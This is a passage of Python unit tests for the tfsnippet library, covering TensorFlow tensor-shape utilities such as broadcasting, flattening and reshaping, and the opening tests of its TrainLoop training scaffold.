np.testing.assert_allclose(sess.run(y), x.reshape([1, 2, 3]))
# test partially dynamic shape
t = tf.placeholder(shape=[2, None], dtype=tf.float64)
y = prepend_dims(t, ndims=2)
self.assertEqual(get_static_shape(y), (1, 1, 2, None))
np.testing.assert_allclose(
sess.run(y, feed_dict={t: x}), x.reshape([1, 1, 2, 3]))
# test fully dynamic shape
t = tf.placeholder(shape=None, dtype=tf.float64)
y = prepend_dims(t, ndims=3)
self.assertEqual(get_static_shape(y), None)
np.testing.assert_allclose(
sess.run(y, feed_dict={t: x}), x.reshape([1, 1, 1, 2, 3]))
class FlattenUnflattenTestCase(tf.test.TestCase):
def test_flatten_and_unflatten(self):
def run_check(x, k, dynamic_shape):
if dynamic_shape:
t = tf.placeholder(tf.int32, [None] * len(x.shape))
run = lambda sess, *args: sess.run(*args, feed_dict={t: x})
else:
t = tf.constant(x, dtype=tf.int32)
run = lambda sess, *args: sess.run(*args)
if len(x.shape) == k:
self.assertEqual(flatten_to_ndims(t, k), (t, None, None))
self.assertEqual(unflatten_from_ndims(t, None, None), t)
else:
if k == 1:
front_shape = tuple(x.shape)
static_front_shape = get_static_shape(t)
xx = x.reshape([-1])
else:
front_shape = tuple(x.shape)[: -(k-1)]
static_front_shape = get_static_shape(t)[: -(k - 1)]
xx = x.reshape([-1] + list(x.shape)[-(k-1):])
with self.test_session() as sess:
tt, s1, s2 = flatten_to_ndims(t, k)
self.assertEqual(s1, static_front_shape)
if not dynamic_shape:
self.assertEqual(s2, front_shape)
else:
self.assertEqual(tuple(run(sess, s2)), front_shape)
np.testing.assert_equal(run(sess, tt), xx)
np.testing.assert_equal(
run(sess, unflatten_from_ndims(tt, s1, s2)),
x
)
x = np.arange(120).reshape([2, 3, 4, 5]).astype(np.int32)
run_check(x, 1, dynamic_shape=False)
run_check(x, 1, dynamic_shape=True)
run_check(x, 2, dynamic_shape=False)
run_check(x, 2, dynamic_shape=True)
run_check(x, 3, dynamic_shape=False)
run_check(x, 3, dynamic_shape=True)
run_check(x, 4, dynamic_shape=False)
run_check(x, 4, dynamic_shape=True)
def test_flatten_errors(self):
with pytest.raises(ValueError,
match='`k` must be greater or equal to 1'):
_ = flatten_to_ndims(tf.constant(0.), 0)
with pytest.raises(ValueError,
match='`x` is required to have known number of '
'dimensions'):
_ = flatten_to_ndims(tf.placeholder(tf.float32, None), 1)
with pytest.raises(ValueError,
match='`k` is 2, but `x` only has rank 1'):
_ = flatten_to_ndims(tf.zeros([3]), 2)
def test_unflatten_errors(self):
with pytest.raises(ValueError,
match='`x` is required to have known number of '
'dimensions'):
_ = unflatten_from_ndims(tf.placeholder(tf.float32, None), (1,), (1,))
with pytest.raises(ValueError,
match='`x` only has rank 0, required at least 1'):
_ = unflatten_from_ndims(tf.constant(0.), (1,), (1,))
class BroadcastTestCase(tf.test.TestCase):
def test_broadcast_to_shape(self):
def check(x, shape, x_ph=None, shape_ph=None, static_shape=None):
# compute the expected answer
try:
y = x * np.ones(tuple(shape), dtype=x.dtype)
if len(shape) and y.shape[-len(shape):] != shape:
raise ValueError()
except ValueError:
y = None
# call the function and get output
feed_dict = {}
if x_ph is not None:
feed_dict[x_ph] = x
x = x_ph
if shape_ph is not None:
feed_dict[shape_ph] = np.asarray(shape)
shape = shape_ph
if y is None:
with pytest.raises(Exception, match='`x` cannot be broadcasted '
'to match `shape`'):
t = broadcast_to_shape(x, shape)
_ = sess.run(t, feed_dict=feed_dict)
else:
t = broadcast_to_shape(x, shape)
if static_shape is not None:
self.assertTupleEqual(get_static_shape(t), static_shape)
out = sess.run(t, feed_dict=feed_dict)
self.assertTupleEqual(out.shape, y.shape)
np.testing.assert_equal(out, y)
with self.test_session() as sess:
np.random.seed(1234)
x = np.random.random([2, 1, 3]).astype(np.float32)
# -- fully static shapes --
# good cases
check(x, (3, 2, 5, 3), static_shape=(3, 2, 5, 3))
check(x, (2, 5, 3), static_shape=(2, 5, 3))
check(x, (5, 3), static_shape=(2, 5, 3))
# error cases
check(x, (1, 1, 1, 1))
check(x, (1, 1, 1))
check(x, (1, 1))
# -- partially dynamic shapes on broadcast axis --
x_ph = tf.placeholder(shape=(2, None, 3), dtype=tf.float32)
# good cases
check(x, (3, 2, 5, 3), x_ph=x_ph, static_shape=(3, 2, 5, 3))
check(x, (2, 5, 3), x_ph=x_ph, static_shape=(2, 5, 3))
check(x, (5, 3), x_ph=x_ph, static_shape=(2, 5, 3))
# error cases
check(x, (1, 1, 1, 1), x_ph=x_ph)
check(x, (1, 1, 1), x_ph=x_ph)
check(x, (1, 1), x_ph=x_ph)
# -- partially dynamic shapes on non-broadcast axis --
x_ph = tf.placeholder(shape=(None, 1, 3), dtype=tf.float32)
# good cases
check(x, (3, 2, 5, 3), x_ph=x_ph, static_shape=(3, 2, 5, 3))
check(x, (2, 5, 3), x_ph=x_ph, static_shape=(2, 5, 3))
check(x, (5, 3), x_ph=x_ph, static_shape=(None, 5, 3))
# error cases
check(x, (1, 1, 1, 1), x_ph=x_ph)
check(x, (1, 1, 1), x_ph=x_ph)
check(x, (1, 1), x_ph=x_ph)
# -- partially dynamic shapes on all axis --
x_ph = tf.placeholder(shape=(None, None, None), dtype=tf.float32)
# good cases
check(x, (3, 2, 5, 3), x_ph=x_ph, static_shape=(3, 2, 5, 3))
check(x, (2, 5, 3), x_ph=x_ph, static_shape=(2, 5, 3))
check(x, (5, 3), x_ph=x_ph, static_shape=(None, 5, 3))
# error cases
check(x, (1, 1, 1, 1), x_ph=x_ph)
check(x, (1, 1, 1), x_ph=x_ph)
check(x, (1, 1), x_ph=x_ph)
# -- fully dynamic shapes --
x_ph = tf.placeholder(shape=None, dtype=tf.float32)
shape_ph = tf.placeholder(shape=None, dtype=tf.int32)
# good cases
check(x, (3, 2, 5, 3), x_ph=x_ph, shape_ph=shape_ph)
check(x, (2, 5, 3), x_ph=x_ph, shape_ph=shape_ph)
check(x, (5, 3), x_ph=x_ph, shape_ph=shape_ph)
# error cases
check(x, (1, 1, 1, 1), x_ph=x_ph, shape_ph=shape_ph)
check(x, (1, 1, 1), x_ph=x_ph, shape_ph=shape_ph)
check(x, (1, 1), x_ph=x_ph, shape_ph=shape_ph)
def test_broadcast_to_shape_strict(self):
def check(x, shape, x_ph=None, shape_ph=None, static_shape=None):
# compute the expected answer
try:
y = x * np.ones(tuple(shape), dtype=x.dtype)
if y.shape != shape:
raise ValueError()
except ValueError:
y = None
# call the function and get output
feed_dict = {}
if x_ph is not None:
feed_dict[x_ph] = x
x = x_ph
if shape_ph is not None:
feed_dict[shape_ph] = np.asarray(shape)
shape = shape_ph
if y is None:
with pytest.raises(Exception, match='`x` cannot be broadcasted '
'to match `shape`'):
t = broadcast_to_shape_strict(x, shape)
_ = sess.run(t, feed_dict=feed_dict)
else:
t = broadcast_to_shape_strict(x, shape)
if static_shape is not None:
self.assertTupleEqual(get_static_shape(t), static_shape)
out = sess.run(t, feed_dict=feed_dict)
self.assertTupleEqual(out.shape, y.shape)
np.testing.assert_equal(out, y)
with self.test_session() as sess:
np.random.seed(1234)
x = np.random.random([2, 1, 3]).astype(np.float32)
# -- fully static shapes --
# good cases
check(x, (3, 2, 5, 3), static_shape=(3, 2, 5, 3))
check(x, (2, 5, 3), static_shape=(2, 5, 3))
# bad cases
check(x, (5, 3))
check(x, (1, 1, 1, 1))
check(x, (1, 1, 1))
check(x, (1, 1))
# -- partially dynamic shapes on all axis --
x_ph = tf.placeholder(shape=(None, None, None), dtype=tf.float32)
# good cases
check(x, (3, 2, 5, 3), x_ph=x_ph, static_shape=(3, 2, 5, 3))
check(x, (2, 5, 3), x_ph=x_ph, static_shape=(2, 5, 3))
# error cases
check(x, (5, 3), x_ph=x_ph)
check(x, (1, 1, 1, 1), x_ph=x_ph)
check(x, (1, 1, 1), x_ph=x_ph)
check(x, (1, 1), x_ph=x_ph)
# -- fully dynamic shapes on x --
x_ph = tf.placeholder(shape=None, dtype=tf.float32)
# good cases
check(x, (3, 2, 5, 3), x_ph=x_ph)
check(x, (2, 5, 3), x_ph=x_ph)
# error cases
check(x, (5, 3), x_ph=x_ph)
check(x, (1, 1, 1, 1), x_ph=x_ph)
check(x, (1, 1, 1), x_ph=x_ph)
check(x, (1, 1), x_ph=x_ph)
# -- fully dynamic shapes on both x and shape --
x_ph = tf.placeholder(shape=None, dtype=tf.float32)
shape_ph = tf.placeholder(shape=None, dtype=tf.int32)
# good cases
check(x, (3, 2, 5, 3), x_ph=x_ph, shape_ph=shape_ph)
check(x, (2, 5, 3), x_ph=x_ph, shape_ph=shape_ph)
# error cases
check(x, (5, 3), x_ph=x_ph, shape_ph=shape_ph)
check(x, (1, 1, 1, 1), x_ph=x_ph, shape_ph=shape_ph)
check(x, (1, 1, 1), x_ph=x_ph, shape_ph=shape_ph)
check(x, (1, 1), x_ph=x_ph, shape_ph=shape_ph)
class BroadcastConcatTestCase(tf.test.TestCase):
def test_broadcast_concat(self):
a_ph = tf.placeholder(dtype=tf.float32, shape=[None, 3, 1, None, 1])
b_ph = tf.placeholder(dtype=tf.float32, shape=[6, None, 1, 5, 7, None])
ph = tf.placeholder(dtype=tf.float32, shape=None)
def check(x, y, axis, static_shape):
ndims = max(len(x.shape), len(y.shape))
xx = np.reshape(x, [1] * (ndims - len(x.shape)) + list(x.shape))
yy = np.reshape(y, [1] * (ndims - len(y.shape)) + list(y.shape))
if axis < 0:
axis += ndims
b_shape = [1] * ndims
for i in range(ndims):
if i != axis:
b_shape[i] = max(xx.shape[i], yy.shape[i])
xx = xx * np.ones(b_shape)
yy = yy * np.ones(b_shape)
ans = np.concatenate([xx, yy], axis=axis)
out = broadcast_concat(a_ph, b_ph, axis=axis)
self.assertEqual(get_static_shape(out), static_shape)
np.testing.assert_allclose(
sess.run(out, feed_dict={a_ph: x, b_ph: y}),
ans
)
with self.test_session() as sess:
# test can broadcast
static_shapes = [
(7, None, 3, 5, 7, None),
(6, None, 3, 5, 7, None),
(6, None, 4, 5, 7, None),
(6, None, 3, 6, 7, None),
(6, None, 3, 5, None, None),
(6, None, 3, 5, 7, None)
] * 2
for axis, static_shape in zip(
[-6, -5, -4, -3, -2, -1, 0, 1, 2, 3, 4, 5], static_shapes):
check(
np.random.normal(size=[4, 3, 1, 7, 1]),
np.random.normal(size=[6, 4, 1, 5, 7, 8]),
axis=axis,
static_shape=static_shape
)
for axis in [-5, 1]:
check(
np.random.normal(size=[1, 3, 1, 7, 1]),
np.random.normal(size=[6, 4, 1, 5, 7, 8]),
axis=axis,
static_shape=(6, None, 3, 5, 7, None)
)
for axis in [-2, 4]:
check(
np.random.normal(size=[4, 3, 1, 1, 1]),
np.random.normal(size=[6, 4, 1, 5, 7, 8]),
axis=axis,
static_shape=(6, None, 3, 5, None, None)
)
for axis in [-1, 5]:
check(
np.random.normal(size=[4, 3, 1, 7, 1]),
np.random.normal(size=[6, 4, 1, 5, 7, 1]),
axis=axis,
static_shape=(6, None, 3, 5, 7, None)
)
# test cannot broadcast
with pytest.raises(ValueError, match='`x` with non-deterministic '
'shape is not supported'):
_ = broadcast_concat(ph, b_ph, axis=0)
with pytest.raises(ValueError, match='`y` with non-deterministic '
'shape is not supported'):
_ = broadcast_concat(a_ph, ph, axis=0)
with pytest.raises(ValueError, match='Invalid axis: must >= -6 and '
'<= 5, got -7'):
_ = broadcast_concat(a_ph, b_ph, axis=-7)
with pytest.raises(ValueError, match='Invalid axis: must >= -6 and '
'<= 5, got 6'):
_ = broadcast_concat(a_ph, b_ph, axis=6)
with pytest.raises(ValueError, match='`x` and `y` cannot be '
'broadcast concat'):
_ = broadcast_concat(tf.zeros([2, 2]), tf.zeros([3, 3]), axis=0)
# runtime check
t = broadcast_concat(a_ph, b_ph, axis=-1)
with pytest.raises(Exception, match='`x` and `y` cannot be '
'broadcast concat'):
_ = sess.run(t, feed_dict={
a_ph: np.random.normal(size=[3, 3, 1, 7, 1]),
b_ph: np.random.normal(size=[6, 4, 1, 5, 7, 8]),
})
class TransposeConv2dAxisTestCase(tf.test.TestCase):
def test_transpose_conv2d_axis(self):
np.random.seed(1234)
x = np.random.normal(size=[17, 11, 32, 31, 5]).astype(np.float32)
x_ph = tf.placeholder(tf.float32, [None, None, None, None, 5])
y = np.transpose(x, [0, 1, 4, 2, 3])
self.assertEqual(y.shape, (17, 11, 5, 32, 31))
y_ph = tf.placeholder(tf.float32, [None, None, 5, None, None])
g = lambda x, f, t, ph=None: sess.run(
transpose_conv2d_axis(tf.constant(x), f, t),
feed_dict=({ph: x} if ph is not None else None)
)
with self.test_session() as sess:
# test static shape
np.testing.assert_allclose(g(x, True, True), x)
np.testing.assert_allclose(g(x, True, False), y)
np.testing.assert_allclose(g(y, False, True), x)
np.testing.assert_allclose(g(y, False, False), y)
# test dynamic shape
np.testing.assert_allclose(g(x, True, True, x_ph), x)
np.testing.assert_allclose(g(x, True, False, x_ph), y)
np.testing.assert_allclose(g(y, False, True, y_ph), x)
np.testing.assert_allclose(g(y, False, False, y_ph), y)
def test_transpose_conv2d_channels_x_to_x(self):
np.random.seed(1234)
x = np.random.normal(size=[17, 11, 32, 31, 5]).astype(np.float32)
y = np.transpose(x, [0, 1, 4, 2, 3])
self.assertEqual(y.shape, (17, 11, 5, 32, 31))
with self.test_session() as sess:
# test conv2d_channels_last_to_x
g = lambda t, c: sess.run(
transpose_conv2d_channels_last_to_x(tf.constant(t), c))
np.testing.assert_allclose(g(x, True), x)
np.testing.assert_allclose(g(x, False), y)
# test conv2d_channels_x_to_last
g = lambda t, c: sess.run(
transpose_conv2d_channels_x_to_last(tf.constant(t), c))
np.testing.assert_allclose(g(x, True), x)
np.testing.assert_allclose(g(y, False), x)
class ReshapeTailTestCase(tf.test.TestCase):
def test_reshape_tail(self):
def check(x, ndims, shape, expected_shape, static_shape=None,
x_ph=None, shape_ph=None):
# compute the answer
assert(len(x.shape) >= ndims)
if ndims > 0:
y = np.reshape(x, x.shape[:-ndims] + tuple(shape))
else:
y = np.reshape(x, x.shape + tuple(shape))
self.assertEqual(y.shape, expected_shape)
# validate the output
feed_dict = {}
if x_ph is not None:
feed_dict[x_ph] = x
x = x_ph
if shape_ph is not None:
feed_dict[shape_ph] = shape
shape = shape_ph
y_tensor = reshape_tail(x, ndims, shape)
if static_shape is not None:
self.assertTupleEqual(get_static_shape(y_tensor), static_shape)
y_out = sess.run(y_tensor, feed_dict=feed_dict)
self.assertTupleEqual(y_out.shape, y.shape)
np.testing.assert_equal(y_out, y)
x = np.random.normal(size=[4, 5, 6]).astype(np.float32)
with self.test_session() as sess:
# check static shape
check(x, 0, [], (4, 5, 6), (4, 5, 6))
check(x, 0, [1, 1], (4, 5, 6, 1, 1), (4, 5, 6, 1, 1))
check(x, 1, [-1], (4, 5, 6), (4, 5, 6))
check(x, 1, [2, 3], (4, 5, 2, 3), (4, 5, 2, 3))
check(x, 2, [-1], (4, 30), (4, 30))
check(x, 2, [6, 5], (4, 6, 5), (4, 6, 5))
check(x, 2, [3, 2, 5], (4, 3, 2, 5), (4, 3, 2, 5))
check(x, 3, [-1], (120,), (120,))
check(x, 3, [3, -1], (3, 40), (3, 40))
# check dynamic shape #1
x_ph = tf.placeholder(dtype=tf.float32, shape=[None, 5, 6])
check(x, 0, [], (4, 5, 6), (None, 5, 6), x_ph=x_ph)
check(x, 0, [1, 1], (4, 5, 6, 1, 1), (None, 5, 6, 1, 1),
x_ph=x_ph)
check(x, 1, [-1], (4, 5, 6), (None, 5, 6), x_ph=x_ph)
check(x, 1, [2, -1], (4, 5, 2, 3), (None, 5, 2, 3), x_ph=x_ph)
check(x, 2, [-1], (4, 30), (None, 30), x_ph=x_ph)
check(x, 2, [-1, 5], (4, 6, 5), (None, 6, 5), x_ph=x_ph)
check(x, 2, [3, -1, 5], (4, 3, 2, 5), (None, 3, 2, 5), x_ph=x_ph)
check(x, 3, [-1], (120,), (None,), x_ph=x_ph)
check(x, 3, [3, -1], (3, 40), (3, None), x_ph=x_ph)
# check dynamic shape #2
x_ph = tf.placeholder(dtype=tf.float32, shape=[None, 5, None])
check(x, 0, [], (4, 5, 6), (None, 5, None), x_ph=x_ph)
check(x, 0, [1, 1], (4, 5, 6, 1, 1), (None, 5, None, 1, 1),
x_ph=x_ph)
check(x, 1, [-1], (4, 5, 6), (None, 5, None), x_ph=x_ph)
check(x, 1, [2, 3], (4, 5, 2, 3), (None, 5, 2, 3), x_ph=x_ph)
check(x, 2, [-1], (4, 30), (None, None), x_ph=x_ph)
check(x, 2, [6, 5], (4, 6, 5), (None, 6, 5), x_ph=x_ph)
check(x, 2, [3, 2, 5], (4, 3, 2, 5), (None, 3, 2, 5), x_ph=x_ph)
check(x, 3, [-1], (120,), (None,), x_ph=x_ph)
check(x, 3, [3, -1], (3, 40), (3, None), x_ph=x_ph)
# check fully dynamic shape
x_ph = tf.placeholder(dtype=tf.float32, shape=None)
shape_ph = tf.placeholder(dtype=tf.int32, shape=None)
check(x, 0, [], (4, 5, 6), x_ph=x_ph, shape_ph=shape_ph)
check(x, 0, [1, 1], (4, 5, 6, 1, 1), x_ph=x_ph, shape_ph=shape_ph)
check(x, 1, [-1], (4, 5, 6), x_ph=x_ph, shape_ph=shape_ph)
check(x, 1, [2, 3], (4, 5, 2, 3), x_ph=x_ph, shape_ph=shape_ph)
check(x, 2, [-1], (4, 30), x_ph=x_ph, shape_ph=shape_ph)
check(x, 2, [6, 5], (4, 6, 5), x_ph=x_ph, shape_ph=shape_ph)
check(x, 2, [3, 2, 5], (4, 3, 2, 5), x_ph=x_ph, shape_ph=shape_ph)
check(x, 3, [-1], (120,), x_ph=x_ph, shape_ph=shape_ph)
check(x, 3, [3, -1], (3, 40), x_ph=x_ph, shape_ph=shape_ph)
# check errors
with pytest.raises(ValueError,
match='`shape` is not a valid shape: at most '
'one `-1` can be specified'):
_ = reshape_tail(x, 1, [-1, -1])
with pytest.raises(ValueError,
match='`shape` is not a valid shape: 0 is not '
'allowed'):
_ = reshape_tail(x, 1, [0])
with pytest.raises(Exception,
match=r'rank\(input\) must be at least ndims'):
_ = sess.run(reshape_tail(x, 5, [-1]))
with pytest.raises(Exception,
match=r'rank\(input\) must be at least ndims'):
_ = sess.run(reshape_tail(x_ph, 5, [-1]), feed_dict={x_ph: x})
with pytest.raises(Exception,
match=r'Cannot reshape the tail dimensions of '
r'`input` into `shape`'):
_ = sess.run(reshape_tail(x, 2, [7, -1]))
```
#### File: tests/scaffold/test_train_loop.py
```python
import os
import re
import time
from collections import OrderedDict
import pytest
import numpy as np
import tensorflow as tf
from mock import Mock
from tfsnippet.dataflows import DataFlow
from tfsnippet.scaffold import (TrainLoop, CheckpointSavableObject,
ScheduledVariable)
from tfsnippet.scaffold.train_loop_ import (TRAIN_LOOP_STATES_CKPT_NAME,
EARLY_STOPPING_STATES_CKPT_NAME)
from tfsnippet.utils import (TemporaryDirectory,
ensure_variables_initialized,
get_default_session_or_error)
def get_variable_values(variables):
sess = get_default_session_or_error()
return sess.run(variables)
def set_variable_values(variables, values):
sess = get_default_session_or_error()
sess.run([tf.assign(v, a) for v, a in zip(variables, values)])
class TrainLoopTestCase(tf.test.TestCase):
def assertMatches(self, a, b):
self.assertTrue(
not not re.match(b, a),
msg='{!r} should match {!r}'.format(b, a)
)
def test_counter_attributes(self):
with TrainLoop([]) as loop:
self.assertEqual(loop.epoch, 0)
self.assertEqual(loop.step, 0)
self.assertIsNone(loop.max_epoch)
self.assertIsNone(loop.max_step)
self.assertFalse(loop.within_epoch)
self.assertFalse(loop.within_step)
with TrainLoop([], max_epoch=2, max_step=10,
summary_metric_prefix='123/') as loop:
self.assertEqual(loop.max_epoch, 2)
self.assertEqual(loop.max_step, 10)
self.assertEqual(loop._summary_metric_prefix, '123/')
loop.max_epoch = 20
loop.max_step = 100
self.assertEqual(loop.max_epoch, 20)
self.assertEqual(loop.max_step, 100)
def test_counters(self):
# test loop with configured `max_epoch`
with TrainLoop([], max_epoch=2) as loop:
epoch_counter = 0
step_counter = 0
for epoch in loop.iter_epochs():
epoch_counter += 1
self.assertEqual(epoch, epoch_counter)
self.assertTrue(loop.within_epoch)
self.assertFalse(loop.within_step)
x_ans = 0
for step, [x] in \
loop.iter_steps(DataFlow.arrays([np.arange(4)], 1)):
self.assertTrue(loop.within_step)
self.assertEqual(step, loop.step)
self.assertEqual(epoch, loop.epoch)
self.assertEqual(x, x_ans)
self.assertIsInstance(loop.step_data, tuple)
self.assertEqual(len(loop.step_data), 1)
np.testing.assert_equal(loop.step_data[0], x_ans)
x_ans += 1
step_counter += 1
self.assertEqual(step, step_counter)
self.assertEqual(step_counter, loop.step)
self.assertEqual(epoch, loop.epoch)
self.assertEqual(epoch_counter, 2)
self.assertEqual(step_counter, 8)
# test loop with configured `max_step`
with TrainLoop([], max_step=10) as loop:
epoch_counter = 0
step_counter = 0
for epoch in loop.iter_epochs():
epoch_counter += 1
self.assertEqual(epoch, epoch_counter)
for step in loop.iter_steps():
step_counter += 1
self.assertEqual(step, step_counter)
self.assertEqual(epoch_counter, 1)
self.assertEqual(step_counter, 10)
# test loop with configured `max_step` with payload
with TrainLoop([], max_step=10) as loop:
epoch_counter = 0
step_counter = 0
for epoch in loop.iter_epochs():
epoch_counter += 1
self.assertEqual(epoch, epoch_counter)
x_ans = 0
for step, x in loop.iter_steps(np.arange(4)):
self.assertEqual(x, x_ans)
x_ans += 1
step_counter += 1
self.assertEqual(step, step_counter)
self.assertEqual(epoch_counter, 3)
self.assertEqual(step_counter, 10)
# test loop with configured `max_step` and `max_epoch`,
# while `max_epoch` finishes first
with TrainLoop([], max_step=10, max_epoch=2) as loop:
epoch_counter = 0
step_counter = 0
for epoch in loop.iter_epochs():
epoch_counter += 1
self.assertEqual(epoch, epoch_counter)
for step, _ in loop.iter_steps(np.arange(4)):
step_counter += 1
self.assertEqual(step, step_counter)
self.assertEqual(epoch_counter, 2)
self.assertEqual(step_counter, 8)
# test loop with configured `max_step` and `max_epoch`,
# while `max_step` finishes first
with TrainLoop([], max_step=10, max_epoch=3) as loop:
epoch_counter = 0
step_counter = 0
for epoch in loop.iter_epochs():
epoch_counter += 1
self.assertEqual(epoch, epoch_counter)
for step, _ in loop.iter_steps(np.arange(4)):
step_counter += 1
self.assertEqual(step, step_counter)
self.assertEqual(epoch_counter, 3)
self.assertEqual(step_counter, 10)
def test_get_progress(self):
null_print = lambda x: None
# test no progress
with TrainLoop([], max_epoch=None, max_step=None) as loop:
self.assertIsNone(loop.get_progress())
# test infer progress from epoch
with TrainLoop([], max_epoch=10, max_step=None,
print_func=null_print) as loop:
np.testing.assert_allclose(0., loop.get_progress())
for i in loop.iter_epochs():
np.testing.assert_allclose((i - 1) * .1, loop.get_progress())
loop.print_logs()
np.testing.assert_allclose(i * .1, loop.get_progress())
np.testing.assert_allclose(1., loop.get_progress())
# test infer progress from step
with TrainLoop([], max_epoch=None, max_step=100,
print_func=null_print) as loop:
np.testing.assert_allclose(0., loop.get_progress())
for _ in loop.iter_epochs():
for _ in loop.iter_steps([0, 1, 2]):
step = loop.step
np.testing.assert_allclose(
(step - 1) * .01, loop.get_progress())
loop.print_logs()
np.testing.assert_allclose(
step * .01, loop.get_progress())
np.testing.assert_allclose(1., loop.get_progress())
# test infer progress from epoch & steps_per_epoch
with TrainLoop([], max_epoch=10, print_func=null_print) as loop:
np.testing.assert_allclose(0., loop.get_progress())
for i in loop.iter_epochs():
np.testing.assert_allclose((i - 1) * .1, loop.get_progress())
for _, j in loop.iter_steps([0, 1, 2, 3, 4]):
if i == 1:
np.testing.assert_allclose(0., loop.get_progress())
loop.print_logs()
np.testing.assert_allclose(0., loop.get_progress())
else:
np.testing.assert_allclose(
(i - 1) * .1 + j * .02, loop.get_progress())
loop.print_logs()
np.testing.assert_allclose(
(i - 1) * .1 + (j + 1) * .02, loop.get_progress())
if i == 1:
np.testing.assert_allclose(0., loop.get_progress())
loop.print_logs()
np.testing.assert_allclose(.1, loop.get_progress())
else:
np.testing.assert_allclose(i * .1, loop.get_progress())
loop.print_logs()
np.testing.assert_allclose(i * .1, loop.get_progress())
np.testing.assert_allclose(1., loop.get_progress())
def test_logs(self):
logs = []
with TrainLoop([], max_step=6, print_func=logs.append) as loop:
for epoch in loop.iter_epochs():
for step, x in loop.iter_steps(np.arange(4)):
time.sleep(0.01)
loop.collect_metrics(x=x)
if step % 2 == 0:
loop.print_logs()
loop.collect_metrics(y=epoch)
loop.print_logs()
self.assertMatches('\n'.join(logs), re.compile(
r'^'
r'\[Epoch 1, Step 2/6, ETA \S+\] step time: 0\.01\d*s \(±[^ ]+s\); '
r'x: 0\.5 \(±0\.5\)\n'
r'\[Epoch 1, Step 4/6, ETA \S+\] step time: 0\.01\d*s \(±[^ ]+s\); '
r'x: 2\.5 \(±0\.5\)\n'
r'\[Epoch 1, Step 4/6, ETA \S+\] epoch time: 0\.0[456]\d*s; '
r'step time: 0\.01\d*s \(±[^ ]+s\); x: 1\.5 \(±1\.11803\); '
r'y: 1\n'
r'\[Epoch 2, Step 6/6, ETA \S+\] step time: 0\.01\d*s \(±[^ ]+s\); '
r'x: 0\.5 \(±0\.5\)\n'
r'\[Epoch 2, Step 6/6, ETA \S+\] epoch time: 0\.0[23]\d*s; '
r'step time: 0\.01\d*s \(±[^ ]+s\); x: 0\.5 \(±0\.5\); y: 2'
r'$'
))
def test_single_epoch_logs(self):
logs = []
with TrainLoop([], max_epoch=1, print_func=logs.append,
show_eta=False) as loop:
for epoch in loop.iter_epochs():
for step, x in loop.iter_steps(np.arange(4)):
time.sleep(0.01)
loop.collect_metrics(x=x)
if step % 2 == 0:
loop.print_logs()
loop.collect_metrics(y=epoch)
loop.print_logs()
self.assertMatches('\n'.join(logs), re.compile(
r'^'
r'\[Step 2\] step time: 0\.01\d*s \(±[^ ]+s\); '
r'x: 0\.5 \(±0\.5\)\n'
r'\[Step 4\] step time: 0\.01\d*s \(±[^ ]+s\); '
r'x: 2\.5 \(±0\.5\)\n'
r'\[Step 4\] epoch time: 0\.0[456]\d*s; '
r'step time: 0\.01\d*s \(±[^ ]+s\); x: 1\.5 \(±1\.11803\); '
r'y: 1'
r'$'
))
def test_valid_metric_default_settings(self):
logs = []
with TrainLoop([], print_func=logs.append, show_eta=False) as loop:
self.assertEqual(loop.valid_metric_name, 'valid_loss')
self.assertTrue(loop.valid_metric_smaller_is_better)
self.assertFalse(loop.use_early_stopping)
for _ in loop.iter_epochs():
best_metric = 1.
for _, valid_loss in loop.iter_steps([0.8, 0.6, 0.7]):
loop.collect_metrics(valid_loss=valid_loss)
best_metric = min(best_metric, valid_loss)
self.assertAlmostEqual(loop.best_valid_metric, best_metric)
loop.print_logs()
loop.print_logs()
break
self.assertAlmostEqual(loop.best_valid_metric, 0.6)
self.assertMatches('\n'.join(logs), re.compile(
r'^'
r'\[Epoch 1, Step 1\] step time: [^ ]+s; '
r'valid loss: 0\.8 \(\*\)\n'
r'\[Epoch 1, Step 2\] step time: [^ ]+s; '
r'valid loss: 0\.6 \(\*\)\n'
r'\[Epoch 1, Step 3\] step time: [^ ]+s; '
r'valid loss: 0\.7\n'
r'\[Epoch 1, Step 3\] epoch time: [^ ]+s; step time: [^ ]+s '
r'\(±[^ ]+s\); valid loss: 0\.7 \(±0\.0816497\)'
r'$'
))
def test_valid_metric_with_custom_settings(self):
logs = []
v = tf.get_variable('a', shape=[1], dtype=tf.int32)
with TrainLoop([v], print_func=logs.append, show_eta=False,
valid_metric_name='y',
valid_metric_smaller_is_better=False) as loop:
self.assertEqual(loop.valid_metric_name, 'y')
self.assertFalse(loop.valid_metric_smaller_is_better)
for _ in loop.iter_epochs():
best_metric = 0.
for _, y in loop.iter_steps([0.7, 0.6, 0.8]):
loop.collect_metrics(y=y)
best_metric = max(best_metric, y)
self.assertAlmostEqual(loop.best_valid_metric, best_metric)
loop.print_logs()
loop.print_logs()
break
self.assertAlmostEqual(loop.best_valid_metric, 0.8)
self.assertMatches('\n'.join(logs), re.compile(
r'^'
r'\[Epoch 1, Step 1\] step time: [^ ]+s; '
r'y: 0\.7 \(\*\)\n'
r'\[Epoch 1, Step 2\] step time: [^ ]+s; '
r'y: 0\.6\n'
r'\[Epoch 1, Step 3\] step time: [^ ]+s; '
r'y: 0\.8 \(\*\)\n'
r'\[Epoch 1, Step 3\] epoch time: [^ ]+s; step time: [^ ]+s '
r'\(±[^ ]+s\); y: 0\.7 \(±0\.0816497\)'
r'$'
))
def test_valid_metric_with_valid_acc(self):
with TrainLoop([], valid_metric_name='valid_acc') as loop:
self.assertEqual(loop.valid_metric_name, 'valid_acc')
self.assertFalse(loop.valid_metric_smaller_is_better)
def test_valid_metric_with_y_as_name(self):
with TrainLoop([], valid_metric_name='y') as loop:
self.assertEqual(loop.valid_metric_name, 'y')
self.assertTrue(loop.valid_metric_smaller_is_better)
def test_training_summary(self):
a = tf.get_variable('a', dtype=tf.float32, shape=(2, 3))
b = tf.get_variable('b', dtype=tf.float32, shape=(4,))
# test param variables in list
logs = []
with TrainLoop([a, b], print_func=logs.append) as loop:
self.assertEqual(loop.param_vars, [a, b])
loop.print_training_summary()
self.assertEqual('\n'.join(logs), (
'Trainable Parameters (10 in total)\n'
'----------------------------------\n'
'a (2, 3) 6\n'
'b (4,) 4\n'
))
# test param variables in dict
logs = []
with TrainLoop(OrderedDict([('aa', a), ('bb', b)]),
print_func=logs.append) as loop:
self.assertEqual(loop.param_vars, {'aa': a, 'bb': b})
loop.print_training_summary()
self.assertEqual('\n'.join(logs), (
'Trainable Parameters (10 in total)\n'
'----------------------------------\n'
'aa (2, 3) 6\n'
'bb (4,) 4\n'
))
def test_timeit(self):
logs = []
with TrainLoop([], max_epoch=1, print_func=logs.append,
show_eta=False) as loop:
for _ in loop.iter_epochs():
